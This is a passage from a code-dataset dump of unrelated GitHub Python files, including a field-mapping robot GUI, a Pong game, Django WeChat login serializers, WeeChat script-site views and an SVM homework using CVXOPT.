self.scan_volume_gradient()\n elif self.quantity_combo.currentText() == \"Field\":\n self.scan_volume_field() \n self.auto_scan.clicked.connect(scan)\n\n def set_savedir(self):\n self.fn = str(QtWidgets.QFileDialog.getExistingDirectory(self, \"Select Directory\"))\n self.auto_savedir.setText(self.fn)\n\n def scan_volume_gradient(self):\n self.scanning = True\n\n dim1 = int((abs(self.a1_max.value() - self.a1_min.value()))/ self.a1_step.value())\n dim2 = int((abs(self.a2_max.value() - self.a2_min.value()))/ self.a2_step.value())\n dim3 = int((abs(self.a3_max.value() - self.a3_min.value()))/ self.a3_step.value())\n\n grad_mag = np.zeros((dim1+1,dim2+1,dim3+1))\n i=0\n j=0\n k=0\n\n for x in np.linspace(self.a1_min.value(), self.a1_max.value(), num=dim1+1):\n j=0\n for y in np.linspace(self.a2_min.value(), self.a2_max.value(), num=dim2+1):\n k=0\n for z in np.linspace(self.a3_min.value(), self.a3_max.value(), num=dim3+1):\n try:\n x_grad = []\n y_grad = []\n z_grad = []\n\n grad = []\n\n self.esp.axis1.pos = x\n self.esp.axis2.pos = y\n self.esp.axis3.pos = z\n\n self.esp.axis1.pos = x - self.a1_step.value()\n x_grad.append(self.gauss.field)\n self.esp.axis1.pos = x + self.a1_step.value()\n x_grad.append(self.gauss.field)\n self.esp.axis1.pos = x\n\n grad.append((x_grad[1] - x_grad[0])/(2*(self.a1_step.value()*1e-3)))\n\n self.esp.axis2.pos = y - self.a2_step.value()\n y_grad.append(self.gauss.field)\n self.esp.axis2.pos = y + self.a2_step.value()\n y_grad.append(self.gauss.field)\n self.esp.axis2.pos = y\n\n grad.append((y_grad[1]-y_grad[0])/(2*(self.a2_step.value()*1e-3)))\n\n self.esp.axis3.pos = z - self.a3_step.value()\n z_grad.append(self.gauss.field)\n self.esp.axis3.pos = z + self.a3_step.value()\n z_grad.append(self.gauss.field)\n self.esp.axis3.pos = z\n\n grad.append((z_grad[1]-z_grad[0])/(2*(self.a3_step.value()*1e-3)))\n\n grad_mag[i,j,k] = np.sqrt(grad[0]**2+grad[1]**2+grad[2]**2)\n except Exception as ex:\n print(\"Caught an error, skipping point\")\n print(ex)\n np.save(self.fn + \"/grad.errbak\",grad_mag)\n\n k+=1\n j+=1\n i+=1\n\n np.save(self.fn + \"/grad\",grad_mag)\n\n self.scanning = False\n\n def scan_volume_field(self):\n self.scanning = True\n\n dim1 = int((abs(self.a1_max.value() - self.a1_min.value()))/ self.a1_step.value())\n dim2 = int((abs(self.a2_max.value() - self.a2_min.value()))/ self.a2_step.value())\n dim3 = int((abs(self.a3_max.value() - self.a3_min.value()))/ self.a3_step.value())\n\n x_mag = np.zeros((dim1+1,dim2+1,dim3+1))\n y_mag = np.zeros((dim1+1, dim2+1, dim3+1))\n z_mag = np.zeros((dim1+1, dim2+1, dim3+1))\n i=0\n j=0\n k=0\n\n for x in np.linspace(self.a1_min.value(), 
self.a1_max.value(), num=dim1+1):\n j=0\n for y in np.linspace(self.a2_min.value(), self.a2_max.value(), num=dim2+1):\n k=0\n for z in np.linspace(self.a3_min.value(), self.a3_max.value(), num=dim3+1):\n x_grad = []\n y_grad = []\n z_grad = []\n\n grad = []\n\n self.esp.axis1.pos = x\n sleep(0.4)\n self.esp.axis2.pos = y\n sleep(0.4)\n self.esp.axis3.pos = z\n sleep(1.0)\n\n allf = self.gauss.allf()\n\n x_mag[i,j,k] = allf[0]\n y_mag[i,j,k] = allf[1]\n z_mag[i,j,k] = allf[2]\n\n k+=1\n j+=1\n np.save(self.fn + \"/xfield\",x_mag)\n np.save(self.fn + \"/yfield\",y_mag)\n np.save(self.fn + \"/zfield\",z_mag)\n i+=1\n\n np.save(self.fn + \"/xfield\",x_mag)\n np.save(self.fn + \"/yfield\",y_mag)\n np.save(self.fn + \"/zfield\",z_mag)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n aw = RobotControl()\n\n aw.show()\n sys.exit(app.exec_())\n","repo_name":"gcassella/field-mapper","sub_path":"UI/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":7312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5946088343","text":"import pickle\nfrom dataclasses import dataclass, field\nfrom typing import Dict, Counter, List\n\n\n@dataclass\nclass Vocabulary:\n token_to_id: Dict = field(default_factory=dict)\n type_to_id: Dict = field(default_factory=dict)\n label_to_id: Dict = field(default_factory=dict)\n\n def add_from_counter(\n self, target_field: str, counter: Counter, n_most_values: int = -1, add_values: List[str] = None,\n ):\n if not hasattr(self, target_field):\n raise ValueError(f\"There is no {target_field} attribute in vocabulary class\")\n if add_values is None:\n add_values = []\n if n_most_values == -1:\n add_values += list(zip(*counter.most_common()))[0]\n else:\n add_values += list(zip(*counter.most_common(n_most_values - len(add_values))))[0]\n attr = {value: i for i, value in enumerate(add_values)}\n setattr(self, target_field, attr)\n\n def dump(self, path: str):\n with open(path, \"wb\") as pickle_file:\n pickle.dump(\n {\"token_to_id\": self.token_to_id, \"type_to_id\": self.type_to_id, \"label_to_id\": self.label_to_id},\n pickle_file,\n )\n\n @staticmethod\n def load(path: str):\n with open(path, \"rb\") as pickle_file:\n data = pickle.load(pickle_file)\n if not isinstance(data, dict) and not all([k in data for k in [\"token_to_id\", \"type_to_id\", \"label_to_id\"]]):\n raise RuntimeError(\"Incorrect data inside pickled file\")\n return Vocabulary(**data)\n","repo_name":"bzz/code2seq-pyTorch","sub_path":"dataset/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"37105286316","text":"from board import Board\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scoreboard import ScoreBoard\nimport time\n\nboard = Board()\nboard.turn_off_tracer()\nright_paddle = Paddle(350,0)\nleft_paddle = Paddle(-350,0)\nball = Ball()\nscoreboard = ScoreBoard()\n\nboard.listen_for_key()\nboard.on_key(right_paddle.up, 'Up')\nboard.on_key(right_paddle.down, 'Down')\nboard.on_key(left_paddle.up, 'w')\nboard.on_key(left_paddle.down, 'a')\ngame_on = True\n\nwhile game_on:\n \n time.sleep(0.1)\n board.update_screen()\n ball.move_ball()\n \n if ball.ycor() > 280 or ball.ycor() < -280:\n ball.bounce_y()\n ball.speed_up()\n \n if ball.distance(right_paddle) < 50 and ball.xcor() > 320 or ball.distance(left_paddle) < 50 and ball.xcor() < -320:\n ball.bounce_x()\n 
ball.speed_up()\n \n if ball.xcor() < -380:\n ball.reset()\n scoreboard.l_point()\n \n \n if ball.xcor() > 380:\n ball.reset()\n scoreboard.r_point()\n \n\nboard.exit_screen()","repo_name":"mattshakespeare/100_days_of_code","sub_path":"pong_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6101126557","text":"from collections import deque\ndef dfs(array,visited):\n dx = [-1,0,1,0]\n dy = [0,-1,0,1]\n q = deque()\n q.append([0,0])\n visited[0][0] = 1\n while(q):\n x,y = q.popleft()\n for i in range(4):\n ddx = x + dx[i]\n ddy = y + dy[i]\n if ddx < 0 or ddx>=len(array) or ddy <0 or ddy >= len(array[0]):\n continue\n elif visited[ddx][ddy] != -1:\n continue\n elif array[ddx][ddy] == 0:\n continue\n else:\n q.append([ddx,ddy])\n visited[ddx][ddy] = visited[x][y] + 1\n\n return visited\ndef solution(maps):\n visited = [[-1]*len(maps[0]) for _ in range(len(maps))]\n answer = dfs(maps, visited)\n if answer[-1][-1] == 1:\n return -1\n else:\n return answer[-1][-1]","repo_name":"yujeonghyeop/progrramers","sub_path":"Level2/Level2.gamemap/gamemap.py","file_name":"gamemap.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32947275306","text":"print('\\nWELCOME MY PROGRAMM !!!')\n# n=0\n# while True:\n# kalit=input('Malumotlarimga kirish uchun kalit: ')\n# if kalit!='Bobur':\n# n+=1\n# if kalit=='BOBUR' and n!=3:\n# oilam={\n# 'Dadam' : \"ismi Rashid yoshi 42 Xorazim viloyatida tug'ilgan \",\n# 'Onam' : \"ismi Adolat yoshi 40 Xorazim viloyatida tug'ilgan \",\n# 'Ukam' : \"ismi Bunyod yoshi 16 Xorazim viloyatida tug'ilgan \"\n# }\n# malumot=input('Kim haqda: ')\n# if malumot in oilam:\n# print(oilam[malumot])\n# elif n!=3:\n# continue\n# else:\n# break\n\n\nprint('Malumot o\\'rnida !!!\\n0: tugatish\\n1: o\\'ynash\\n2: malumot qo\\'shish\\n3: malumot o\\'chirish\\n4: qidirish')\ntaomlar=['osh','chuchvara','do\\'lma','kabob','no\\'xot','makaron']\nodamlar=['Samandar','Aka','Habibullo','Bobur','Azizbek','Nodir']\nt_o={}\nfor i in range(len(odamlar)):\n t_o[odamlar[i]]=taomlar[i]\nwhile True:\n kalit=int(input('Nima buyurasiz: '))\n if kalit==0:\n break\n elif kalit==1:\n for i in odamlar:\n print(t_o[i])\n elif kalit==2:\n n=int(input('malumotlar soni: '))\n for i in range(n):\n a=input('kalitini kiriting: ')\n b=input('malumotni kiriting: ')\n odamlar.append(a)\n taomlar.append(b)\n t_o[a]=b\n elif kalit==3:\n m=int(input('malumotlar soni: '))\n if m<=len(odamlar):\n for i in range(m):\n malumot=input('kalitini kiriting: ')\n if malumot in odamlar:\n odamlar.remove(malumot)\n taomlar.remove(t_o[malumot]) \n del t_o[malumot]\n else:\n print('ERROR ???')\n elif kalit==4:\n kalit2=input('Qidirayotgan malumotizzi kaliti: ')\n if kalit2 in t_o:\n print(t_o[kalit2])\n else:\n print('uzur janob bizda bu xaqda malumot yoq ???')\n else:\n print('ERROR ???')\n \n\n\n\n","repo_name":"BOLAKAY0144/malumotlar_kirim_chiqim","sub_path":"dastur1.py","file_name":"dastur1.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20678338710","text":"import json\nfrom datetime import datetime\n\nfrom django.contrib.auth import authenticate\nfrom rest_framework import serializers\nfrom rest_framework_jwt.settings import api_settings\n\nfrom users.models import Users, WechatUser\nfrom 
utils.wechat_sdk import wechat_login\n\njwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\njwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\njwt_decode_handler = api_settings.JWT_DECODE_HANDLER\njwt_get_username_from_payload = api_settings.JWT_PAYLOAD_GET_USERNAME_HANDLER\n\n\nclass UserSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Users\n fields = ('id', 'username', 'mobile', 'email', 'avatar', 'nickname', 'is_employee')\n\n\nclass LoginSerializer(serializers.Serializer):\n\n username = serializers.CharField(write_only=True, required=True, allow_null=False)\n password = serializers.CharField(write_only=True, required=True, allow_null=False)\n\n def validate(self, validated_data):\n user = authenticate(**validated_data)\n\n if not user:\n raise serializers.ValidationError('账���或密码错误!')\n else:\n if not user.is_active:\n raise serializers.ValidationError('账号已禁用!')\n\n payload = jwt_payload_handler(user)\n user.last_login = datetime.now()\n user.save()\n\n return {\n \"token\": jwt_encode_handler(payload),\n \"user\": user\n }\n\n\nclass WechatLoginSerializer(serializers.Serializer):\n\n code = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n js_code = validated_data.pop('code')\n\n status_code, result = wechat_login.code2session(js_code)\n\n if status_code != 200:\n raise serializers.ValidationError('微信获取openid失败')\n\n result = json.loads(result)\n wechat_user = WechatUser.objects.filter(openid=result['openid']).first()\n if wechat_user and wechat_user.user:\n # 签发token\n user = wechat_user.user\n payload = jwt_payload_handler(user)\n token = jwt_encode_handler(payload)\n validated_data['token'] = token\n if wechat_user and not wechat_user.user:\n validated_data['openid'] = result['openid'] # 严格来说是需要使用session_key加密openid,这里偷懒明文传输\n else:\n wechat_user = WechatUser(openid=result['openid'], session_key=result['session_key'])\n wechat_user.save()\n validated_data['openid'] = result['openid']\n self.context['view'].validated_data = validated_data\n return wechat_user\n\n\nclass WechatRegisterSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True)\n code = serializers.CharField(write_only=True)\n openid = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n code = validated_data.pop('code')\n openid = validated_data.pop('openid')\n result = wechat_login.get_phone_number(code)\n if result.get('errcode') != 0:\n raise serializers.ValidationError('微信获取手机号失败。')\n\n validated_data['mobile'] = result['phone_info']['purePhoneNumber']\n user = super(WechatRegisterSerializer, self).create(validated_data)\n WechatUser.objects.filter(openid=openid).update(user=user)\n\n # 签发token\n payload = jwt_payload_handler(user)\n token = jwt_encode_handler(payload)\n validated_data['token'] = token\n self.context['view'].validated_data = validated_data\n return user\n\n class Meta:\n model = Users\n fields = ('id', 'nickname', 'avatar', 'code', 'openid')\n","repo_name":"WytheLi/laijinguozi-server","sub_path":"apps/users/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"24141533482","text":"from datetime import datetime\nfrom pygments import highlight\nfrom pygments.formatters import HtmlFormatter\nfrom pygments.lexers import get_lexer_by_name\n\nfrom django.conf import settings\nfrom django.core.mail import EmailMessage\nfrom django.http import 
HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404\n\nfrom weechat.common.path import files_path_join\nfrom weechat.download.models import Release\nfrom weechat.scripts.models import (\n Script,\n ScriptFormAdd,\n ScriptFormUpdate,\n get_language_from_extension,\n)\n\n# list of keys that are sorted by default using descending order\nKEY_ORDER_BY_DESC = (\n 'popularity',\n 'min_weechat',\n 'max_weechat',\n 'added',\n 'updated',\n)\n\nPYGMENTS_LEXER = {\n 'pl': 'perl',\n 'py': 'python',\n 'rb': 'ruby',\n 'lua': 'lua',\n 'tcl': 'tcl',\n 'scm': 'scheme',\n 'js': 'javascript',\n 'php': 'php',\n}\n\n\ndef get_sort_key(sort_key):\n \"\"\"Get sort keys to sort scripts (in SQL request).\"\"\"\n keys = sort_key.split(',')\n if 'name' not in keys:\n keys.append('name')\n for i, key in enumerate(keys):\n if key in KEY_ORDER_BY_DESC:\n keys[i] = f'-{key}'\n return keys\n\n\ndef get_highlighted_source(source, language):\n \"\"\"Get source highlighted with pygments.\"\"\"\n return highlight(source,\n get_lexer_by_name(language, stripnl=True,\n encoding='utf-8'),\n HtmlFormatter(cssclass='pygments', linenos='table'))\n\n\ndef scripts(request, sort_key='popularity', filter_name='', filter_value=''):\n \"\"\"Page with list of scripts.\"\"\"\n # pylint: disable=too-many-locals,too-many-branches\n\n def sort_by_popularity(item):\n return (-1 * item[1], item[0].lower())\n\n def sort_by_name(item):\n return item[0].lower()\n\n script_list = (Script.objects.filter(approved=True)\n .order_by(*get_sort_key(sort_key)))\n if filter_name == 'tag':\n script_list = (script_list\n .filter(tags__regex=rf'(^|,){filter_value}($|,)'))\n elif filter_name == 'language':\n if filter_value == 'python2-compatible':\n script_list = (script_list\n .filter(language='python')\n .filter(tags__regex=r'(^|,)py2($|,)'))\n elif filter_value == 'python2-only':\n script_list = (script_list\n .filter(language='python')\n .exclude(tags__regex=r'(^|,)py3($|,)'))\n elif filter_value == 'python3-compatible':\n script_list = (script_list\n .filter(language='python')\n .filter(tags__regex=r'(^|,)py3($|,)'))\n elif filter_value == 'python3-only':\n script_list = (script_list\n .filter(language='python')\n .exclude(tags__regex=r'(^|,)py2($|,)'))\n else:\n script_list = script_list.filter(language=filter_value)\n elif filter_name == 'license':\n script_list = script_list.filter(license=filter_value)\n elif filter_name == 'author':\n script_list = script_list.filter(author=filter_value)\n languages = {}\n licenses = {}\n tags = {}\n for script in script_list:\n languages[script.language] = languages.get(script.language, 0) + 1\n if script.language == 'python':\n py2_ok = script.is_py2_ok()\n py3_ok = script.is_py3_ok()\n if py2_ok:\n languages['python2-compatible'] = \\\n languages.get('python2-compatible', 0) + 1\n if not py3_ok:\n languages['python2-only'] = \\\n languages.get('python2-only', 0) + 1\n if py3_ok:\n languages['python3-compatible'] = \\\n languages.get('python3-compatible', 0) + 1\n if not py2_ok:\n languages['python3-only'] = \\\n languages.get('python3-only', 0) + 1\n licenses[script.license] = licenses.get(script.license, 0) + 1\n if script.tags:\n for tag in script.tagslist():\n tags[tag] = tags.get(tag, 0) + 1\n script_filters_displayed, script_filters_sort = (\n request.COOKIES.get('script_filters', '0_name').split('_'))\n if script_filters_sort == 'popularity':\n sort_function = sort_by_popularity\n else:\n sort_function = sort_by_name\n return render(\n request,\n 'scripts/list.html',\n {\n 
'script_list': script_list,\n 'sort_key': sort_key,\n 'filter_name': filter_name,\n 'filter_value': filter_value,\n 'script_filters_displayed': int(script_filters_displayed),\n 'script_filters_sort': script_filters_sort,\n 'languages': sorted(languages.items(), key=sort_function),\n 'licenses': sorted(licenses.items(), key=sort_function),\n 'tags': sorted(tags.items(), key=sort_function),\n },\n )\n\n\ndef script_source(request, scriptid='', scriptname=''):\n \"\"\"Page with source of a script.\"\"\"\n script = None\n if scriptid:\n script = get_object_or_404(Script, id=scriptid)\n try:\n with open(files_path_join(script.path(),\n script.name_with_extension()),\n 'rb') as _file:\n htmlsource = get_highlighted_source(_file.read(),\n script.language)\n except: # noqa: E722 pylint: disable=bare-except\n raise Http404\n else:\n sname = scriptname\n sext = ''\n pos = sname.rfind('.')\n if pos > 0:\n sext = sname[pos+1:]\n sname = sname[0:pos]\n script = get_object_or_404(\n Script,\n name=sname,\n language=get_language_from_extension(sext),\n )\n try:\n with open(files_path_join(script.path(),\n script.name_with_extension()),\n 'rb') as _file:\n htmlsource = get_highlighted_source(_file.read(),\n PYGMENTS_LEXER[sext])\n except: # noqa: E722 pylint: disable=bare-except\n raise Http404\n return render(\n request,\n 'scripts/source.html',\n {\n 'script': script,\n 'htmlsource': htmlsource,\n },\n )\n\n\ndef get_script_content(script_file):\n \"\"\"Get content of script file (replace \"\\r\\n\" by \"\\n\").\"\"\"\n content = script_file.read()\n if isinstance(content, bytes):\n content = content.decode('utf-8')\n return content.replace('\\r\\n', '\\n')\n\n\ndef form_add(request):\n \"\"\"Page with form to add a script.\"\"\"\n if request.method == 'POST':\n form = ScriptFormAdd(request.POST, request.FILES)\n if form.is_valid():\n scriptfile = request.FILES['file']\n\n # add script in database\n now = datetime.now()\n script = Script(approved=False,\n popularity=0,\n name=form.cleaned_data['name'],\n version=form.cleaned_data['version'],\n url='',\n language=form.cleaned_data['language'],\n license=form.cleaned_data['license'],\n desc_en=form.cleaned_data['description'],\n requirements=form.cleaned_data['requirements'],\n min_weechat=form.cleaned_data['min_weechat'],\n author=form.cleaned_data['author'],\n mail=form.cleaned_data['mail'],\n added=now,\n updated=now)\n\n # write script in pending directory\n filename = files_path_join('scripts', 'pending1',\n script.name_with_extension())\n with open(filename, 'w') as _file:\n _file.write(get_script_content(scriptfile))\n\n # send e-mail\n try:\n subject = f'WeeChat: new script {script.name_with_extension()}'\n sender = (f'{form.cleaned_data[\"author\"]} '\n f'<{form.cleaned_data[\"mail\"]}>')\n body = (f'Script : {form.cleaned_data[\"name\"]}\\n'\n f'Version : {form.cleaned_data[\"version\"]}\\n'\n f'Language : {form.cleaned_data[\"language\"]}\\n'\n f'License : {form.cleaned_data[\"license\"]}\\n'\n f'Description : {form.cleaned_data[\"description\"]}\\n'\n f'Requirements: {form.cleaned_data[\"requirements\"]}\\n'\n f'Min WeeChat : {form.cleaned_data[\"min_weechat\"]}\\n'\n f'Author : {sender}>\\n'\n f'\\n'\n f'Comment:\\n{form.cleaned_data[\"comment\"]}\\n')\n email = EmailMessage(subject, body, sender,\n settings.SCRIPTS_MAILTO)\n email.attach_file(filename)\n email.send()\n except: # noqa: E722 pylint: disable=bare-except\n return HttpResponseRedirect('/scripts/adderror/')\n\n # save script in database\n script.save()\n\n return 
HttpResponseRedirect('/scripts/addok/')\n else:\n form = ScriptFormAdd()\n return render(\n request,\n 'scripts/add.html',\n {\n 'form': form,\n },\n )\n\n\ndef form_update(request):\n \"\"\"Page with form to update a script.\"\"\"\n if request.method == 'POST':\n form = ScriptFormUpdate(request.POST, request.FILES)\n if form.is_valid():\n scriptfile = request.FILES['file']\n script = Script.objects.get(id=form.cleaned_data['script'])\n\n # send e-mail\n try:\n subject = (f'WeeChat: new release for script '\n f'{script.name_with_extension()}')\n sender = (f'{form.cleaned_data[\"author\"]} '\n f'<{form.cleaned_data[\"mail\"]}>')\n body = (f'Script : {script.name_with_extension()} '\n f'({script.version_weechat()})\\n'\n f'New version: {form.cleaned_data[\"version\"]}\\n'\n f'Author : {sender}\\n'\n f'\\n'\n f'Comment:\\n{form.cleaned_data[\"comment\"]}\\n')\n email = EmailMessage(subject, body, sender,\n settings.SCRIPTS_MAILTO)\n email.attach(script.name_with_extension(),\n get_script_content(scriptfile),\n 'text/plain')\n email.send()\n except: # noqa: E722 pylint: disable=bare-except\n return HttpResponseRedirect('/scripts/updateerror/')\n\n return HttpResponseRedirect('/scripts/updateok/')\n else:\n form = ScriptFormUpdate()\n return render(\n request,\n 'scripts/update.html',\n {\n 'form': form,\n },\n )\n\n\ndef pending(request):\n \"\"\"Page with scripts pending for approval.\"\"\"\n script_list = Script.objects.filter(approved=False).order_by('-added')\n return render(\n request,\n 'scripts/pending.html',\n {\n 'script_list': script_list,\n },\n )\n\n\ndef python3(request):\n \"\"\"Page with Python 3 transition.\"\"\"\n v037_date = Release.objects.get(version='0.3.7').date\n v037_date = datetime(\n year=v037_date.year,\n month=v037_date.month,\n day=v037_date.day,\n )\n status_list = []\n # status when the transition started\n status_list.append({\n 'date': datetime(2018, 6, 3),\n 'scripts': 347,\n 'python_scripts': 216,\n 'scripts_ok': 43,\n 'scripts_remaining': 173,\n })\n # status on 2019-07-01 (WeeChat is built with Python 3 by default)\n status_list.append({\n 'date': datetime(2019, 7, 1),\n 'scripts': 362,\n 'python_scripts': 226,\n 'scripts_ok': 96,\n 'scripts_remaining': 130,\n })\n # status on 2020-01-01 (initial end of transition)\n status_list.append({\n 'date': datetime(2020, 1, 1),\n 'scripts': 364,\n 'python_scripts': 228,\n 'scripts_ok': 125,\n 'scripts_remaining': 103,\n })\n # status on 2020-05-01 (end of transition)\n status_list.append({\n 'date': datetime(2020, 5, 1),\n 'scripts': 364,\n 'python_scripts': 228,\n 'scripts_ok': 129,\n 'scripts_remaining': 99,\n })\n # status today\n scripts_list = Script.objects.filter(approved=True).count()\n python_scripts = (Script.objects.filter(approved=True)\n .filter(language='python')\n .count())\n scripts_ok = (Script.objects.filter(approved=True)\n .filter(language='python')\n .filter(tags__regex=r'(^|,)py3($|,)')\n .count())\n scripts_remaining = python_scripts - scripts_ok\n status_list.append({\n 'date': datetime.now(),\n 'today': True,\n 'scripts': scripts_list,\n 'python_scripts': python_scripts,\n 'scripts_ok': scripts_ok,\n 'scripts_remaining': scripts_remaining,\n })\n # compute percentages and flag \"future\"\n now = datetime.now()\n for status in status_list:\n status['python_scripts_percent'] = (\n (status['python_scripts'] * 100) // status['scripts']\n )\n status['scripts_ok_percent'] = (\n (status['scripts_ok'] * 100) // status['python_scripts']\n )\n status['scripts_remaining_percent'] = (\n 100 - 
status['scripts_ok_percent']\n )\n status['future'] = status['date'] > now\n return render(\n request,\n 'scripts/python3.html',\n {\n 'python3_date': datetime(2008, 12, 3),\n 'v037_date': v037_date,\n 'roadmap_start': datetime(2018, 6, 3),\n 'roadmap_email': datetime(2018, 6, 16),\n 'roadmap_new_py3': datetime(2018, 7, 1),\n 'roadmap_all_py3': datetime(2018, 9, 1),\n 'roadmap_weechat_py3': datetime(2019, 7, 1),\n 'roadmap_initial_end': datetime(2020, 1, 1),\n 'roadmap_end': datetime(2020, 5, 1),\n 'status_list': status_list,\n },\n )\n","repo_name":"84KaliPleXon3/weechat.org","sub_path":"weechat/scripts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6877576092","text":"from typing import Union, List, Dict\nfrom src.insights.jobs import read\n\n\ndef get_max_salary(path: str) -> int:\n path_reader_data = read(path)\n return max(\n [\n int(data_salary[\"max_salary\"])\n for data_salary in path_reader_data\n if data_salary[\"max_salary\"].isdigit()\n ]\n )\n\n\ndef get_min_salary(path: str) -> int:\n path_reader_data = read(path)\n return min(\n [\n int(data_salary[\"min_salary\"])\n for data_salary in path_reader_data\n if data_salary[\"min_salary\"].isdigit()\n ]\n )\n\n\ndef matches_salary_range(job: Dict, salary: Union[int, str]) -> bool:\n try:\n min_salary = int(job.get(\"min_salary\"))\n max_salary = int(job.get(\"max_salary\"))\n salary = int(salary)\n if min_salary > max_salary:\n raise ValueError\n except (TypeError, KeyError):\n raise ValueError\n return min_salary <= salary <= max_salary\n\n\ndef filter_by_salary_range(\n jobs: List[dict], salary: Union[str, int]\n) -> List[Dict]:\n filtered_jobs = []\n\n for job in jobs:\n try:\n if matches_salary_range(job, salary):\n filtered_jobs.append(job)\n except (TypeError, ValueError): # captura a exceção e continua\n pass\n\n return filtered_jobs\n\n\n# me parece que de alguma forma esta verificação acima está errada e aceita\n# valor que não deveria no filter\n","repo_name":"CamilaPaiz/project-insights","sub_path":"src/insights/salaries.py","file_name":"salaries.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39387331815","text":"#################\r\n#Name - Sayem Lincoln\r\n#PID - A54207835\r\n#Homework 8 Problem 5\r\n#################\r\n\r\nimport time\r\nimport random\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import preprocessing\r\n\r\nfrom scipy.io import loadmat\r\n\r\n# Reading the data from the two mat files called \"data.mat\" and \"USPS.mat\"\r\n\r\ndata = loadmat('data.mat')\r\nusps = loadmat('USPS.mat')\r\n\r\n#################\r\n# PART I : (A)\r\n#################\r\n\r\n## First Data Set \"data.mat\"\r\n\r\nX = pd.DataFrame(data['X'])\r\nX.shape\r\n\r\nX.head()\r\n\r\ny = pd.DataFrame(data['Y'])\r\ny.shape\r\n\r\ny[0].unique()\r\n\r\n# CVXOPT solver and resulting α\r\n\r\nfrom cvxopt import matrix as cvxopt_matrix\r\nfrom cvxopt import solvers as cvxopt_solvers\r\n\r\n#Initializing values and computing H. Note the 1. 
to force to float type\r\nm,n = X.shape\r\ny = y.values.reshape(-1,1) * 1.\r\nX_dash = y * X\r\nH = np.dot(X_dash , X_dash.T) * 1.\r\n\r\n#Converting into cvxopt format\r\nP = cvxopt_matrix(H)\r\nq = cvxopt_matrix(-np.ones((m, 1)))\r\nG = cvxopt_matrix(-np.eye(m))\r\nh = cvxopt_matrix(np.zeros(m))\r\nA = cvxopt_matrix(y.reshape(1, -1))\r\nb = cvxopt_matrix(np.zeros(1))\r\n\r\n#Run solver\r\nsol = cvxopt_solvers.qp(P, q, G, h, A, b)\r\nalphas = np.array(sol['x'])\r\n\r\n\r\n# Compute w and b parameters\r\n\r\n#w parameter in vectorized form\r\nw = ((y * alphas).T @ X.values).reshape(-1,1)\r\n\r\n#Selecting the set of indices S corresponding to non zero parameters\r\nS = (alphas > 1e-4).flatten()\r\n\r\n#Computing b\r\nb = y[S] - np.dot(X[S], w)\r\n\r\n#Display results\r\n#print('Alphas = ',alphas[alphas > 1e-4])\r\nprint('w = ', w.flatten(), '\\n')\r\nprint('b = ', b[0])\r\n\r\n## Second Data Set \"USPS.mat\"\r\n\r\n# We will do the same thing, extract the data and then calculate CVXOPT solver for this data set.\r\n\r\nX = pd.DataFrame(usps['A'])\r\nX.shape\r\n\r\nX.head()\r\n\r\ny = pd.DataFrame(usps['L'])\r\ny.shape\r\n\r\ny[0].unique()\r\n\r\n# In this case, we have a multiclass problem not like the previous one (Binary classification)\r\n\r\n# CVXOPT solver and resulting α\r\n\r\n#Initializing values and computing H. Note the 1. to force to float type\r\nm,n = X.shape\r\ny = y.values.reshape(-1,1) * 1.\r\nX_dash = y * X\r\nX_dash = preprocessing.scale(X_dash)\r\nH = np.dot(X_dash , X_dash.T) * 1.\r\n\r\n\r\n#Converting into cvxopt format\r\nP = cvxopt_matrix(H)\r\nq = cvxopt_matrix(-np.ones((m, 1)))\r\nG = cvxopt_matrix(-np.eye(m))\r\nh = cvxopt_matrix(np.zeros(m))\r\nA = cvxopt_matrix(y.reshape(1, -1))\r\nb = cvxopt_matrix(np.zeros(1))\r\n\r\n#Run solver\r\nsol = cvxopt_solvers.qp(P, q, G, h, A, b)\r\nalphas = np.array(sol['x'])\r\n\r\n# Compute w and b parameters\r\n\r\n#w parameter in vectorized form\r\nw = ((y * alphas).T @ X.values).reshape(-1,1)\r\n\r\n#Selecting the set of indices S corresponding to non zero parameters\r\nS = (alphas > 1e-4).flatten()\r\n\r\n#Computing b\r\nb = y[S] - np.dot(X[S], w)\r\n\r\n#Display results\r\n#print('Alphas = ',alphas[alphas > 1e-4])\r\nprint('w = ', w.flatten(), '\\n')\r\nprint('b = ', b)\r\n\r\n##################\r\n# PART II : (B)\r\n##################\r\n\r\n\r\n\r\n# Now we investigate the second part of the question : Using random datasets (X, y) as input to the algorithm and vary the sample size and feature dimensionality.\r\n\r\ndef solve_random_qp(m, n):\r\n X, y = np.random.random((m, n)), random.sample(([1]*m+[-1]*m), m)\r\n y = np.array(y).reshape(-1,1) * 1.\r\n X_dash = y * X\r\n H = np.dot(X_dash , X_dash.T) * 1.\r\n \r\n #Converting into cvxopt format\r\n P = cvxopt_matrix(H)\r\n q = cvxopt_matrix(-np.ones((m, 1)))\r\n G = 